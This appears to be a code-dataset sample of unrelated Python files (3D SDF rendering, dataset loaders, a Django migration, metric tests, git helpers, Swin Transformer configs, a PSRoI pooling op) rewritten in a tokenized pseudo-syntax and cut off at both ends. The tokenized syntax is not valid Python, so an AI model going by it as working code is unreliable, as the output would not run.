0)<if_stmt>use_rand<block_start>eta_map=torch.rand_like(valid_depth)<times>eta<block_end><else_stmt><block_start>eta_map=torch.ones_like(valid_depth)<times>eta<block_end>valid_normal_inv=self.inv_transform_points(valid_normal.transpose(1 0)).transpose(1 0)<line_sep>offset=valid_normal_inv<times>eta_map.unsqueeze(-1)<line_sep>points_pos=points+offset<line_sep>samples_pos=decode_sdf(self.decoder latent points_pos clamp_dist=clamp_dist).squeeze(-1)<line_sep>samples_pos=samples_pos-eta_map<line_sep>points_neg=points-offset<line_sep>samples_neg=decode_sdf(self.decoder latent points_neg clamp_dist=clamp_dist).squeeze(-1)<line_sep>samples_neg=samples_neg+eta_map<line_sep><return>samples_pos samples_neg<block_end><def_stmt>get_freespace_samples self latent RT depth clamp_dist=0.1 number=1<block_start>R,T=RT[: :3] RT[: 3]<line_sep>cam_pos=self.get_camera_location(R T)<line_sep>cam_rays=self.get_camera_rays(R)<line_sep>depth=depth.reshape(-1)<line_sep>valid_mask=(depth<l>1e5)&(depth<g>0)<line_sep>valid_depth=depth[valid_mask]<line_sep>valid_zdepth=valid_depth/self.calib_map[valid_mask]<line_sep>samples=[]<for_stmt>idx range(number)<block_start>ratio_sample=torch.rand_like(valid_zdepth)<times>1.0<line_sep>input_zdepth=valid_zdepth<times>ratio_sample<line_sep>points=self.generate_point_samples(cam_pos cam_rays[: valid_mask] input_zdepth has_zdepth_grad=<false>)<line_sep>points=points.transpose(1 0)<line_sep>sample=decode_sdf(self.decoder latent points clamp_dist=clamp_dist).squeeze(-1)<line_sep>samples.append(sample)<block_end>samples=torch.cat(samples 0)<line_sep><return>samples<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><pass><block_end> |
<import_from_stmt>chainercv.chainer_experimental.datasets.sliceable.sliceable_dataset _as_key_indices<import_from_stmt>chainercv.chainer_experimental.datasets.sliceable.sliceable_dataset _is_iterable<import_from_stmt>chainercv.chainer_experimental.datasets.sliceable SliceableDataset<class_stmt>GetterDataset(SliceableDataset)<block_start>"""A sliceable dataset class that is defined with getters.
This is a dataset class with getters.
Please refer to the tutorial for more detailed explanation.
Here is an example.
>>> class SliceableLabeledImageDataset(GetterDataset):
>>> def __init__(self, pairs, root='.'):
>>> super(SliceableLabeledImageDataset, self).__init__()
>>> with open(pairs) as f:
>>> self._pairs = [l.split() for l in f]
>>> self._root = root
>>>
>>> self.add_getter('img', self.get_image)
>>> self.add_getter('label', self.get_label)
>>>
>>> def __len__(self):
>>> return len(self._pairs)
>>>
>>> def get_image(self, i):
>>> path, _ = self._pairs[i]
>>> return read_image(os.path.join(self._root, path))
>>>
>>> def get_label(self, i):
>>> _, label = self._pairs[i]
>>> return np.int32(label)
>>>
>>> dataset = SliceableLabeledImageDataset('list.txt')
>>>
>>> # get a subset with label = 0, 1, 2
>>> # no images are loaded
>>> indices = [i for i, label in
... enumerate(dataset.slice[:, 'label']) if label in {0, 1, 2}]
>>> dataset_012 = dataset.slice[indices]
"""<def_stmt>__init__ self<block_start>self._keys=[]<line_sep>self._getters=[]<line_sep>self._return_tuple=<true><block_end><def_stmt>__len__ self<block_start><raise>NotImplementedError<block_end>@property<def_stmt>keys self<block_start><if_stmt>self._return_tuple<block_start><return>tuple(key<for>key,_,_ self._keys)<block_end><else_stmt><block_start><return>self._keys[0][0]<block_end><block_end>@keys.setter<def_stmt>keys self keys<block_start>self._keys=[self._keys[key_index]<for>key_index _as_key_indices(keys self.keys)]<line_sep>self._return_tuple=_is_iterable(keys)<block_end><def_stmt>add_getter self keys getter<block_start>"""Register a getter function
Args:
keys (string or tuple of strings): The name(s) of data
that the getter function returns.
getter (callable): A getter function that takes an index and
returns data of the corresponding example.
"""<line_sep>self._getters.append(getter)<if_stmt>_is_iterable(keys)<block_start><for_stmt>key_index,key enumerate(keys)<block_start>self._keys.append((key len(self._getters)-1 key_index))<block_end><block_end><else_stmt><block_start>self._keys.append((keys len(self._getters)-1 <none>))<block_end><block_end><def_stmt>get_example_by_keys self index key_indices<block_start>example=[]<line_sep>cache={}<for_stmt>key_index key_indices<block_start>_,getter_index,key_index=self._keys[key_index]<if_stmt>getter_index<not><in>cache<block_start>cache[getter_index]=self._getters[getter_index](index)<block_end><if_stmt>key_index<is><none><block_start>example.append(cache[getter_index])<block_end><else_stmt><block_start>example.append(cache[getter_index][key_index])<block_end><block_end><return>tuple(example)<block_end><block_end> |
# Generated by Django 2.2.24 on 2021-06-23 13:28
<import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("events" "0001_initial") ]<line_sep>operations=[migrations.AlterModelOptions(name="event" options={} ) ]<block_end> |
# Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for waymo_ap_metric."""<import_from_stmt>lingvo compat<as>tf<import_from_stmt>lingvo.core py_utils<import_from_stmt>lingvo.core test_utils<import_from_stmt>lingvo.tasks.car.waymo waymo_ap_metric<import_from_stmt>lingvo.tasks.car.waymo waymo_metadata<import_stmt>numpy<as>np<import_from_stmt>waymo_open_dataset label_pb2<line_sep>FLAGS=tf.flags.FLAGS<class_stmt>APTest(test_utils.TestCase)<block_start><def_stmt>testWaymoAPConfig self<block_start>metadata=waymo_metadata.WaymoMetadata()<line_sep># Use 2D metric.
config=waymo_ap_metric.BuildWaymoMetricConfig(metadata '2d' [])<line_sep>vehicle_idx=label_pb2.Label.Type.Value('TYPE_VEHICLE')<line_sep>ped_idx=label_pb2.Label.Type.Value('TYPE_PEDESTRIAN')<line_sep>cyc_idx=label_pb2.Label.Type.Value('TYPE_CYCLIST')<line_sep>thresholds_meta=metadata.IoUThresholds()<line_sep>self.assertNear(config.iou_thresholds[vehicle_idx] thresholds_meta['Vehicle'] 1e-6)<line_sep>self.assertNear(config.iou_thresholds[ped_idx] thresholds_meta['Pedestrian'] 1e-6)<line_sep>self.assertNear(config.iou_thresholds[cyc_idx] thresholds_meta['Cyclist'] 1e-6)<block_end><def_stmt>testPerfectBox self<block_start>metadata=waymo_metadata.WaymoMetadata()<line_sep>params=waymo_ap_metric.WaymoAPMetrics.Params(metadata)<line_sep>m=params.Instantiate()<line_sep># Make one update with a perfect box.
update_dict=py_utils.NestedMap(groundtruth_labels=np.array([1]) groundtruth_bboxes=np.ones(shape=(1 7)) groundtruth_difficulties=np.zeros(shape=(1)) groundtruth_num_points=<none> detection_scores=np.ones(shape=(5 1)) detection_boxes=np.ones(shape=(5 1 7)) detection_heights_in_pixels=np.ones(shape=(5 1)))<line_sep>m.Update('1234' update_dict)<line_sep>waymo_ap=m.value<line_sep>self.assertAllClose(waymo_ap 1./3.)<line_sep># Write a summary.
summary=m.Summary('foo')<line_sep># Check that both AP and APH are in the tags.
tags=[v.tag<for>v summary.value]<line_sep>self.assertIn('foo/Pedestrian/AP_LEVEL_1' tags)<line_sep>self.assertIn('foo/Pedestrian/APH_LEVEL_1' tags)<line_sep>self.assertIn('foo/Pedestrian/AP_LEVEL_2' tags)<line_sep>self.assertIn('foo/Pedestrian/APH_LEVEL_2' tags)<block_end><def_stmt>testWaymoBreakdowns self<block_start>metadata=waymo_metadata.WaymoMetadata()<line_sep>params=waymo_ap_metric.WaymoAPMetrics.Params(metadata)<line_sep>params.waymo_breakdown_metrics=['RANGE' 'VELOCITY']<line_sep>m=params.Instantiate()<line_sep># Make one update with a perfect box.
update_dict=py_utils.NestedMap(groundtruth_labels=np.array([1]) groundtruth_bboxes=np.ones(shape=(1 7)) groundtruth_difficulties=np.zeros(shape=(1)) groundtruth_num_points=<none> groundtruth_speed=np.zeros(shape=(1 2)) detection_scores=np.ones(shape=(5 1)) detection_boxes=np.ones(shape=(5 1 7)) detection_heights_in_pixels=np.ones(shape=(5 1)))<line_sep>m.Update('1234' update_dict)<line_sep># Write a summary.
summary=m.Summary('foo')<line_sep># Check that the summary value for default ap and
# a waymo breakdown version by range is the same.
<for_stmt>v summary.value<block_start><if_stmt>v.tag<eq>'foo/Vehicle/AP_LEVEL_1'<block_start>default_val=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo/Vehicle/APH_LEVEL_1'<block_start>aph_default_val=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/AP_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_1'<block_start>ap_bd_val_l1=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/AP_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_2'<block_start>ap_bd_val_l2=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/APH_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_1'<block_start>aph_bd_val_l1=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/APH_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_2'<block_start>aph_bd_val_l2=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/AP_VELOCITY_TYPE_VEHICLE_STATIONARY_LEVEL_1'<block_start>vbd_val_l1=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/AP_VELOCITY_TYPE_VEHICLE_STATIONARY_LEVEL_2'<block_start>vbd_val_l2=v.simple_value<block_end><block_end>self.assertEqual(ap_bd_val_l1 default_val)<line_sep>self.assertEqual(ap_bd_val_l2 default_val)<line_sep>self.assertEqual(aph_bd_val_l1 aph_default_val)<line_sep>self.assertEqual(aph_bd_val_l2 aph_default_val)<line_sep>self.assertEqual(vbd_val_l1 default_val)<line_sep>self.assertEqual(vbd_val_l2 default_val)<line_sep># Check that eval classes not evaluated are not present.
tags=[v.tag<for>v summary.value]<line_sep>self.assertNotIn('foo_extra/APH_RANGE_TYPE_SIGN_[0, 30)_LEVEL_1' tags)<line_sep>self.assertNotIn('foo_extra/APH_RANGE_TYPE_SIGN_[0, 30)_LEVEL_2' tags)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end> |
<import_stmt>click<import_from_stmt>click.testing CliRunner<import_from_stmt>aiotasks.actions.cli worker<import_stmt>aiotasks.actions.cli<def_stmt>_launch_aiotasks_worker_in_console blah **kwargs<block_start>click.echo("ok")<block_end><def_stmt>test_cli_worker_runs_show_help <block_start>runner=CliRunner()<line_sep>result=runner.invoke(worker)<assert_stmt>'Usage: worker [OPTIONS]'<in>result.output<block_end><def_stmt>test_cli_worker_runs_ok monkeypatch# Patch the launch of: launch_aiotasks_info_in_console
<block_start>aiotasks.actions.cli.launch_aiotasks_worker_in_console=_launch_aiotasks_worker_in_console<line_sep>runner=CliRunner()<line_sep>result=runner.invoke(worker ["-A" "package"])<assert_stmt>'ok'<in>result.output<block_end> |
<import_stmt>os.path<as>mod_path<import_stmt>sys<as>mod_sys<import_stmt>subprocess<import_from_stmt>typing *<def_stmt>assert_in_git_repository <arrow><none><block_start>success,lines=execute_git('status' output=<false>)<if_stmt><not>success<block_start>print('Not a git repository!!!')<line_sep>mod_sys.exit(1)<block_end><block_end><def_stmt>execute_command cmd:Union[str List[str]] output:bool=<true> prefix:str='' grep:Optional[str]=<none><arrow>Tuple[bool str]<block_start>result=''<line_sep>command=cmd<if>type(cmd)<is>list<else>cmd.split(' ')# type: ignore
p=subprocess.Popen(command stdout=subprocess.PIPE stderr=subprocess.STDOUT bufsize=-1)<line_sep>(cmdout cmderr)=p.communicate()<if_stmt>cmdout<is><none><block_start><return>(0 "")<block_end><for_stmt>line cmdout.decode('utf-8').split('\n')<block_start>output_line=prefix+('%s'%line).rstrip()+'\n'<if_stmt><not>grep<or>grep<in>output_line<block_start><if_stmt>output<and>output_line<block_start>print(output_line.rstrip())<line_sep>mod_sys.stdout.flush()<block_end>result<augadd>output_line<block_end><block_end><return>(<not>p.returncode result)<block_end><def_stmt>execute_git command:str output:bool=<true> prefix:str='' grep:str=""<arrow>Tuple[bool str]<block_start><return>execute_command('git %s'%command output prefix grep)<block_end><def_stmt>get_branches remote:bool=<false> all:bool=<false> merged:bool=<false> no_merged:bool=<false><arrow>List[str]<block_start>git_command='branch'<if_stmt>remote<block_start>git_command<augadd>' -r'<block_end><if_stmt>all<block_start>git_command<augadd>' -a'<block_end><if_stmt>merged<is><true><block_start>git_command<augadd>' --merged'<block_end><if_stmt>no_merged<is><true><block_start>git_command<augadd>' --no-merged'<block_end>success,result=execute_git(git_command output=<false>)<assert_stmt>success<assert_stmt>result<def_stmt>_filter_branch branch:str<arrow>str<block_start><if_stmt>'*'<in>branch# Current branch:
<block_start><return>branch.replace('*' '').strip()<block_end><elif_stmt>'->'<in>branch# Branch is an alias
<block_start><return>branch.split('->')[0].strip()<block_end><elif_stmt>'HEAD detached at'<in>branch<block_start><return>'HEAD'<block_end><return>branch.strip()<block_end>lines=result.strip().split('\n')<line_sep>lines=list(map(_filter_branch lines))<line_sep>lines=[line<for>line lines<if>line]<line_sep><return>lines<block_end><def_stmt>delete_branch branch:str force:bool=<false><arrow><none><block_start><if_stmt>branch.startswith('remotes/')<block_start><if_stmt>branch.startswith('remotes/')<block_start>branch=branch.replace('remotes/' '')<block_end>parts=branch.split('/')<if_stmt>len(parts)<ge>2<block_start>origin_name,branch_name=parts[0] "/".join(parts[1:])<line_sep>execute_git('push %s :%s'%(origin_name branch_name))<block_end><else_stmt><block_start>print('Don\'t know how to delete %s'%branch)<block_end><block_end><else_stmt><block_start>execute_git('branch %s %s'%('-D'<if>force<else>'-d' branch))<block_end><block_end><def_stmt>get_config_properties <arrow>Dict[str str]<block_start>executed,output=execute_git('config -l' output=<false>)<if_stmt><not>executed<block_start>print('Error retrieving git config properties')<line_sep>mod_sys.exit(1)<block_end>result={}<line_sep>lines=output.split('\n')<for_stmt>line lines<block_start><if_stmt>'='<in>line<block_start>pos=line.find('=')<line_sep>key=line[0:pos].strip().lower()<line_sep>value=line[pos+1:].strip()<line_sep>result[key]=value<block_end><block_end><return>result<block_end><def_stmt>is_changed <arrow>bool<block_start>""" Checks if current project has any noncommited changes. """<line_sep>executed,changed_lines=execute_git('status --porcelain' output=<false>)<line_sep>merge_not_finished=mod_path.exists('.git/MERGE_HEAD')<line_sep><return>cast(bool changed_lines.strip()<or>merge_not_finished)<block_end><def_stmt>get_git_sha1 branch_name:str<arrow>str<block_start>success,sha1=execute_git('log -1 %s --format=%%H --'%branch_name output=<false>)<if_stmt><not>success<block_start><raise>Exception(f'Invalid branch {branch_name}')<block_end><return>sha1.strip()<block_end><def_stmt>distance_to_commit commit_1:str commit_2:str<arrow>int<block_start>success,log=execute_git(f'rev-list {commit_1}..{commit_2} --count' output=<false>)<if_stmt><not>success<block_start><raise>Exception(f'Error calculating distance between {commit_1}..{commit_2}')<block_end><return>int(log)<block_end> |
<import_from_stmt>allauth.socialaccount.providers.oauth2.urls default_urlpatterns<import_from_stmt>.provider TwitchProvider<line_sep>urlpatterns=default_urlpatterns(TwitchProvider)<line_sep> |
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cache utils.
The cache (default to `~/.cache/tensorflow_datasets/`) is used for:
* The community dataset index list (cached in
`<cache_dir>/community-datasets-list.jsonl` from
`gs://tfds-data/community-datasets-list.jsonl`)
* The installed dataset packages (downloaded from github and installed in
`<cache_dir>/modules/tfds_community/`).
"""<import_stmt>os<import_stmt>sys<import_from_stmt>tensorflow_datasets.core utils<import_from_stmt>tensorflow_datasets.core.utils type_utils<def_stmt>_default_cache_dir <arrow>type_utils.ReadWritePath<block_start>"""Returns the default cache directory."""<if_stmt>'TFDS_CACHE_DIR'<in>os.environ<block_start>path=os.environ['TFDS_CACHE_DIR']<block_end><elif_stmt>'XDG_CACHE_HOME'<in>os.environ<block_start>path=os.path.join(os.environ['XDG_CACHE_HOME'] 'tensorflow_datasets')<block_end><else_stmt><block_start>path=os.path.join('~' '.cache' 'tensorflow_datasets')<block_end><return>utils.as_path(path).expanduser()<block_end>@utils.memoize()<def_stmt>cache_path <arrow>type_utils.ReadWritePath<block_start>"""Returns the path to the TFDS cache."""<line_sep>path=_default_cache_dir()<line_sep>path.mkdir(parents=<true> exist_ok=<true>)<line_sep><return>path<block_end>@utils.memoize()<def_stmt>module_path <arrow>type_utils.ReadWritePath<block_start>"""Returns the path to the cached TFDS dynamically installed modules.
Calling this function will update `sys.path` so modules installed in this
directory can be imported.
Returns:
module_path: The path to the dynamically installed modules.
"""<line_sep>path=cache_path()/'modules/'<line_sep>path.mkdir(parents=<true> exist_ok=<true>)<line_sep># Add the `~/.cache/tensorflow_datasets/modules/` to `sys.path`
sys.path.append(os.fspath(path))<line_sep><return>path<block_end> |
<import_from_stmt>django.conf settings<def_stmt>google_analytics request<block_start><return>{'google_analytics':settings.GOOGLE_ANALYTICS}<block_end> |
<try_stmt><block_start>t=int(input())<for_stmt>i range(t)<block_start>n=int(input())<line_sep>a=list(map(int input().split()))<line_sep>set1=list(set(a))<line_sep>print(len(set1))<block_end><block_end><except_stmt><block_start><pass><block_end> |
# terrascript/data/oraclepaas.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:24:00 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.oraclepaas
#
# instead of
#
# >>> import terrascript.data.hashicorp.oraclepaas
#
# This is only available for 'official' and 'partner' providers.
<import_from_stmt>terrascript.data.hashicorp.oraclepaas *<line_sep> |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper methods for B |eacute| zier curves.
The functions provided by this module have a Cython speedup with the
exact same interface which calls out to a Fortran implementation. The speedup
will be used if the extension can be built.
"""<import_from_stmt>bezier.hazmat curve_helpers<try_stmt><block_start><import_from_stmt>bezier _speedup<block_end><except_stmt>ImportError# pragma: NO COVER
<block_start>_speedup=<none><block_end># pylint: disable=invalid-name
<if_stmt>_speedup<is><none># pragma: NO COVER
<block_start>subdivide_nodes=curve_helpers.subdivide_nodes<line_sep>evaluate_multi=curve_helpers.evaluate_multi<line_sep>evaluate_multi_barycentric=curve_helpers.evaluate_multi_barycentric<line_sep>compute_length=curve_helpers.compute_length<line_sep>elevate_nodes=curve_helpers.elevate_nodes<line_sep>specialize_curve=curve_helpers.specialize_curve<line_sep>evaluate_hodograph=curve_helpers.evaluate_hodograph<line_sep>get_curvature=curve_helpers.get_curvature<line_sep>newton_refine=curve_helpers.newton_refine<line_sep>locate_point=curve_helpers.locate_point<line_sep>reduce_pseudo_inverse=curve_helpers.reduce_pseudo_inverse<line_sep>full_reduce=curve_helpers.full_reduce<block_end><else_stmt><block_start>subdivide_nodes=_speedup.subdivide_nodes_curve<line_sep>evaluate_multi=_speedup.evaluate_multi<line_sep>evaluate_multi_barycentric=_speedup.evaluate_multi_barycentric<line_sep>compute_length=_speedup.compute_length<line_sep>elevate_nodes=_speedup.elevate_nodes<line_sep>specialize_curve=_speedup.specialize_curve<line_sep>evaluate_hodograph=_speedup.evaluate_hodograph<line_sep>get_curvature=_speedup.get_curvature<line_sep>newton_refine=_speedup.newton_refine_curve<line_sep>locate_point=_speedup.locate_point_curve<line_sep>reduce_pseudo_inverse=_speedup.reduce_pseudo_inverse<line_sep>full_reduce=_speedup.full_reduce<block_end># pylint: enable=invalid-name
|
# Import from pod
# Import from third library
<import_stmt>torch<import_from_stmt>torch.autograd Function<import_from_stmt>up.utils.general.log_helper default_logger<as>logger<line_sep># Import from local
<import_from_stmt>.._C psroi_pooling<class_stmt>PSRoIPoolFunction(Function)<block_start>@staticmethod<def_stmt>symbolic g features rois group_size spatial_scale output_dim<block_start><return>g.op("PSRoiPool" features rois output_dim_i=output_dim group_size_i=group_size spatial_scale_f=spatial_scale)<block_end>@staticmethod<def_stmt>forward self features rois group_size spatial_scale output_dim<block_start>self.save_for_backward(features rois)<line_sep>self.group_size=group_size<line_sep>self.spatial_scale=spatial_scale<line_sep>self.output_dim=output_dim<line_sep>batch_size,num_channels,data_height,data_width=features.size()<line_sep>num_rois=rois.shape[0]<line_sep>output=features.new(num_rois self.output_dim self.group_size self.group_size).zero_()<line_sep>mapping_channel=torch.IntTensor(num_rois self.output_dim self.group_size self.group_size).zero_()<line_sep>forward_fn=psroi_pooling.forward_cuda<if_stmt><not>features.is_cuda<block_start>logger.warning('---CPU version of PSRoIPooling is a dummpy function, which is used to support tocaffe')<line_sep>forward_fn=psroi_pooling.forward_cpu<block_end><else_stmt><block_start>mapping_channel=mapping_channel.cuda()<block_end>forward_fn(self.group_size self.group_size self.output_dim self.spatial_scale features rois output mapping_channel)<line_sep>self.mapping_channel=mapping_channel<line_sep><return>output<block_end>@staticmethod<def_stmt>backward self grad_output<block_start>grad_output=grad_output.data<line_sep>feature,rois=self.saved_tensors<assert_stmt>grad_output.is_cuda<line_sep>batch_size,num_channels,data_height,data_width=feature.shape<line_sep>grad_input=grad_output.new(batch_size num_channels data_height data_width).zero_()<line_sep>psroi_pooling.backward_cuda(self.group_size self.group_size self.output_dim self.spatial_scale grad_output rois grad_input self.mapping_channel)<line_sep><return>grad_input <none> <none> <none> <none><block_end><block_end><class_stmt>PSRoIPool(torch.nn.Module)<block_start><def_stmt>__init__ self group_size output_dim=<none> spatial_scale=<none><block_start>super(PSRoIPool self).__init__()<line_sep>self.group_size=int(group_size)<if_stmt>spatial_scale<is><not><none><block_start>logger.warning('`spatial_scale` is deprecated in PSRoIPool.__ini__, '<concat>'we move `spatial_scale` to `forward` arguments `stride` for flexiability')<block_end><if_stmt>output_dim<is><not><none><block_start>logger.warning('`output_dim` is deprecated in PSRoIPool.__ini__, '<concat>'we will calculate `output_dim` by chanels of pooled '<concat>'`features` and `group_size` dynamically')<block_end><block_end><def_stmt>forward self rois features stride<block_start>"""
Arguments:
rois: [N, >=5] (batch_idx, x1, y1, x2, y2)
Notes:
1. rois must be N*5 dim
2. in fp16 mode, feature.dtype is fp16, but rois.dtype may not
3. tensor must be contiguous before passing to the C code
"""<line_sep>rois=rois[: :5].contiguous().to(dtype=features.dtype)<line_sep>features=features.contiguous()<assert_stmt>rois.shape[1]<eq>5 rois.shape<line_sep>spatial_scale=1.0/stride<line_sep>output_dim=features.shape[1]<floordiv>self.group_size<power>2<line_sep># In ONNX context, tensor.shape is type of tensor, while symbolic of PSRoIPool requires
# the argumement of output_dim is int
<if_stmt>torch.is_tensor(output_dim)<block_start>output_dim=output_dim.item()<block_end><assert_stmt>self.group_size<power>2<times>output_dim<eq>features.shape[1]<line_sep><return>PSRoIPoolFunction.apply(features rois self.group_size spatial_scale output_dim)<block_end><def_stmt>__repr__ self<block_start>s='{name} ({group_size})'<line_sep><return>s.format(name=self.__class__.__name__ **self.__dict__)<block_end>@classmethod<def_stmt>from_params cls params<block_start>group_size=params['pool_size']<line_sep><return>cls(group_size)<block_end><block_end> |
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
IMAGENET_DEFAULT_MEAN=[0.485 0.456 0.406]<line_sep>IMAGENET_DEFAULT_STD=[0.229 0.224 0.225]<def_stmt>_cfg url='' **kwargs<block_start><return>{'url':url 'num_classes':1000 'input_size':(3 224 224) 'pool_size':<none> 'crop_pct':.9 'interpolation':'bicubic' 'fixed_input_size':<true> 'mean':IMAGENET_DEFAULT_MEAN 'std':IMAGENET_DEFAULT_STD 'first_conv':'patch_embed.proj' 'classifier':'head' **kwargs}<block_end>model_cfgs={# patch models (my experiments)
'swin_base_patch4_window12_384':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22kto1k.pth' input_size=(3 384 384) crop_pct=1.0) 'swin_base_patch4_window7_224':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window7_224_22kto1k.pth' ) 'swin_large_patch4_window12_384':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window12_384_22kto1k.pth' input_size=(3 384 384) crop_pct=1.0) 'swin_large_patch4_window7_224':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22kto1k.pth' ) 'swin_small_patch4_window7_224':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_small_patch4_window7_224.pth' ) 'swin_tiny_patch4_window7_224':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth' ) 'swin_base_patch4_window12_384_in22k':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22k.pth' input_size=(3 384 384) crop_pct=1.0 num_classes=21841) 'swin_base_patch4_window7_224_in22k':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window7_224_22k.pth' num_classes=21841) 'swin_large_patch4_window12_384_in22k':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window12_384_22k.pth' input_size=(3 384 384) crop_pct=1.0 num_classes=21841) 'swin_large_patch4_window7_224_in22k':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22k.pth' num_classes=21841) }<def_stmt>build_configs name **kwargs<block_start>config=model_cfgs[name]<line_sep>model_architectures={'swin_base_patch4_window12_384':dict(patch_size=4 window_size=12 embed_dim=128 depths=(2 2 18 2) num_heads=(4 8 16 32) **kwargs) 'swin_base_patch4_window7_224':dict(patch_size=4 window_size=7 embed_dim=128 depths=(2 2 18 2) num_heads=(4 8 16 32) **kwargs) 'swin_large_patch4_window12_384':dict(patch_size=4 window_size=12 embed_dim=192 depths=(2 2 18 2) num_heads=(6 12 24 48) **kwargs) 'swin_large_patch4_window7_224':dict(patch_size=4 window_size=7 embed_dim=192 depths=(2 2 18 2) num_heads=(6 12 24 48) **kwargs) 'swin_small_patch4_window7_224':dict(patch_size=4 window_size=7 embed_dim=96 depths=(2 2 18 2) num_heads=(3 6 12 24) **kwargs) 'swin_tiny_patch4_window7_224':dict(patch_size=4 window_size=7 embed_dim=96 depths=(2 2 6 2) num_heads=(3 6 12 24) **kwargs) 'swin_base_patch4_window12_384_in22k':dict(patch_size=4 window_size=12 embed_dim=128 depths=(2 2 18 2) num_heads=(4 8 16 32) **kwargs) 'swin_base_patch4_window7_224_in22k':dict(patch_size=4 window_size=7 embed_dim=128 depths=(2 2 18 2) num_heads=(4 8 16 32) **kwargs) 'swin_large_patch4_window12_384_in22k':dict(patch_size=4 window_size=12 embed_dim=192 depths=(2 2 18 2) num_heads=(6 12 24 48) **kwargs) 'swin_large_patch4_window7_224_in22k':dict(patch_size=4 window_size=7 embed_dim=192 depths=(2 2 18 2) num_heads=(6 12 24 48) **kwargs)}<line_sep><return>model_architectures[name] config<block_end> |
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
<import_stmt>time<import_stmt>sys<import_stmt>numpy<as>np<import_stmt>unicodedata<import_stmt>six<import_stmt>re<import_stmt>tensorflow<as>tf<import_from_stmt>absl app<import_from_stmt>argparse ArgumentParser<import_stmt>pandas<as>pd<import_from_stmt>utils tokenizer<import_from_stmt>utils.tokenizer Subtokenizer<import_from_stmt>utils metrics<line_sep>flags=tf.compat.v1.flags<line_sep>FLAGS=flags.FLAGS<line_sep>flags.DEFINE_integer("batch_size" 64 "run batch size")<line_sep>flags.DEFINE_string("input_graph" <none> "The path of input model file.")<line_sep>flags.DEFINE_string("inputs_file" <none> "File saved to an output file.")<line_sep>flags.DEFINE_string("reference_file" <none> "File containing reference translation.")<line_sep>flags.DEFINE_string("vocab_file" <none> "Path to subtoken vocabulary file.")<line_sep>flags.DEFINE_string("config" <none> "Config json file")<line_sep>flags.DEFINE_string("output_model" <none> "The output model of the quantized model.")<line_sep>flags.DEFINE_string("mode" "tune" "One of three options: 'benchmark'/'accuracy'/'tune'.")<line_sep>flags.DEFINE_integer("iters" -1 "The iteration used for benchmark.")<class_stmt>UnicodeRegex(object)<block_start><def_stmt>__init__ 